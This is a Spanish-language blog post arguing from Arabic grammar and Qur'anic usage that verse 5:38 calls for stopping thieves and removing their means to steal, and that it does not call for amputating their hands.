miércoles , noviembre 22 2017

“Cortadles las manos”

Una de las consecuencias de las metodologías exocoránicas, donde el relato fuera del Corán condiciona ya no solo la terminología coránica sino incluso su propia estructura oracional, es que estas derivan en interpretaciones que no solo no coinciden con el espíritu del Corán, sino que lo contradicen y lo enfrentan de lleno hasta el punto de incurrir en errores elementales relacionados con aspectos gramaticales de la lengua.

Y este es el caso de la ley penal recogida en la jurisprudencia de las escuelas oficiales del fiqh, es decir, todas aquellas fundadas por los poderes políticos de las primeras dinastías que gobernaron en el nombre del islam, donde se sentencia que la pena del robo, sobre todo si es recurrente, es cortarle la mano al ladrón o la ladrona, o sea, amputarlas.

Si bien es cierto que en la actualidad, salvo raros casos como en Arabia Saudí, muchos juristas han optado por la suspensión temporal de esta pena al no cumplirse las condiciones sociales adecuadas, especialmente las económicas, sí confirman sin embargo la validez legal de la pena y su legitimidad religiosa.

Esta pena, como muchas otras, emanan de las fuentes de los relatos recopilados dos siglos tras la muerte del Mensajero Muhammad. Pero, además, el castigo de cortar la mano concretamente tiene como base la interpretación de una aleya coránica cuya interpretación viene a decir lo siguiente:

Azora 5 aleya 38

﴿وَالسَّارِقُ وَالسَّارِقَةُ فَاقْطَعُوا أَيْدِيَهُمَا جَزَاءً بِمَا كَسَبَا نَكَالًا مِّنَ اللَّـهِ ۗ وَاللَّـهُ عَزِيزٌ حَكِيمٌ

“Al ladrón y a la ladrona, cortadles las manos como retribución de lo que han cometido, como castigo ejemplar de Alá. Alá es poderoso, sabio”.

En la traducción observamos una serie de adaptaciones semánticas para sostener que la idea de cortar es amputar. El primer error es traducir kasaba (adquirir) por “cometer” y el siguiente error es traducir nakala (evitar, impedir, delimitar, prevenir, obstaculizar) por “castigo ejemplar” y, por supuesto, el tercer error semántico es traducir qata´a por “cortar” en el sentido de “amputar”.

Pero si observamos el uso del verbo qata´a en el Corán, usado 33 veces con sus distintos derivados, todos sus significados giran en torno a dos sentidos. El primero es dividir grupos, por ejemplo, dividir la gente en tribus, en naciones, en gente que hace el bien y gente que hace el mal (7:160 y 7:168). Y el segundo es interrumpir las causas o los cauces o interrumpir que una acción sea posible o que un plan o conspiración se lleven a cabo. Como ejemplo tenemos estas dos aleyas:

وَالَّذِينَ يَنقُضُونَ عَهْدَ اللَّـهِ مِن بَعْدِ مِيثَاقِهِ وَيَقْطَعُونَ مَا أَمَرَ اللَّـهُ بِهِ أَن يُوصَلَ وَيُفْسِدُونَ فِي الْأَرْضِ ۙ أُولَـٰئِكَ لَهُمُ اللَّعْنَةُ وَلَهُمْ سُوءُ الدَّارِ

Pero quienes violan el pacto con Dios después de haberlo contraído, impiden lo que Dios ha ordenado que se enlace y corrompen en la tierra, ésos serán malditos y tendrán una Morada detestable“.

Es obvio que aquí impedir lo que Dios ha ordenado no puede significar amputar lo que Dios ha ordenado, porque es el mismo verbo: qata´a.

A nivel de oración, se genera además una contradicción en el sentido de la propia oración. Porque después la siguiente aleya dice:

فَمَن تَابَ مِن بَعْدِ ظُلْمِهِ وَأَصْلَحَ فَإِنَّ اللَّـهَ يَتُوبُ عَلَيْهِ ۗ إِنَّ اللَّـهَ غَفُورٌ رَّحِيمٌ

“Pero, Dios perdonará a quien, tras su mal comportamiento, se arrepienta y repare el mal que cometió. En verdad, Dios es perdonador, misericordiosísimo con los creyentes”.

La contradicción que subyace de esta aleya es la posibilidad de retorno, arrepentimiento y reparo, ya que resulta que el castigo de amputar las manos elimina toda posibilidad de retorno y, para colmo, completa la aleya la frase  “Dios es perdonador y compasivo”. Si se cumple el castigo significa que no hubo perdón, sino que se llevó a cabo el castigo consecuente y, desde luego, no hubo compasión. Y, por otro lado, la palabra usada para referirse a cortar miembros, es decir, amputar, sería en árabe batara, y no creo que a Dios se le escapara o la desconociera.

Pero quizás lo más grave de este asunto es que “mano” en esta aleya no puede significar el miembro. Veamos por qué.

Necesitamos saber que el número de las palabras en árabe, a diferencia del español, se divide en singular, dual y plural, es decir, que dos cosas en árabe no son plural sino dual, por lo tanto el plural es cuando hablamos de tres cosas en adelante.

Así que la palabra mano es “iad”, su dual (dos manos) dependiendo del caso se declina como “iadán” o “iadain” y su plural es “aid”.

El flagrante error en la interpretación es el siguiente:

La oración dice “sus” (de ellos dos –dual-) y “manos” en plural, “aidiihimá”. Si quisiera referirse la aleya a “sus” indicando las manos como miembros no usaría el plural sino el dual y diría “iadaihimá” porque nadie tiene tres manos, a lo que algunos responden que entre los dos suman cuatro, lo que gramaticalmente sería un absurdo, pues las manos como miembros no son igual que lápices o pelotas que pudieran compartirse, sino que forman parte de cada uno y son intransferibles. Y este es el peor error en la interpretación.

Entonces,  ¿qué significa manos en plural? Manos en plural o singular en árabe y especialmente en el uso coránico hace referencia, principalmente, al poder o la capacidad o autoría. Una de estas aleyas nos lo deja muy claro:

Azora 38 aleya 37:

اصْبِرْ عَلَىٰ مَا يَقُولُونَ وَاذْكُرْ عَبْدَنَا دَاوُودَ ذَا الْأَيْدِ ۖ إِنَّهُ أَوَّابٌ

“Ten paciencia con lo que dicen y recuerda a Nuestro siervo David, el de las manos. Su arrepentimiento era sincero”.

Aquí manos está en plural y, obviamente, no se refiere a que David tenga tres manos, sino que posee gran capacidad y poder, porque además de profeta era rey.

Como conclusión de este breve análisis, la aleya habla de impedir a aquellos que se dedican al robo que puedan seguir haciéndolo y cortarles los medios que les permiten robar. Y esto no es una cuestión de reinterpretación fruto de influencias del modernismo o el humanismo u otros ismos, es gramática elemental y sentido común.

Así que la aleya quedaría de la siguiente manera:

Al que se dedica a robar y a la que se dedica a robar impedidles y detenedles de acuerdo con lo que han adquirido ilícitamente, una prevención que Dios os advierte, ciertamente Dios es Digno y Sabio, pero quien retorna y repare lo que hizo  Dios retorna a él, ciertamente Dios omite las faltas y es Compasivo. 

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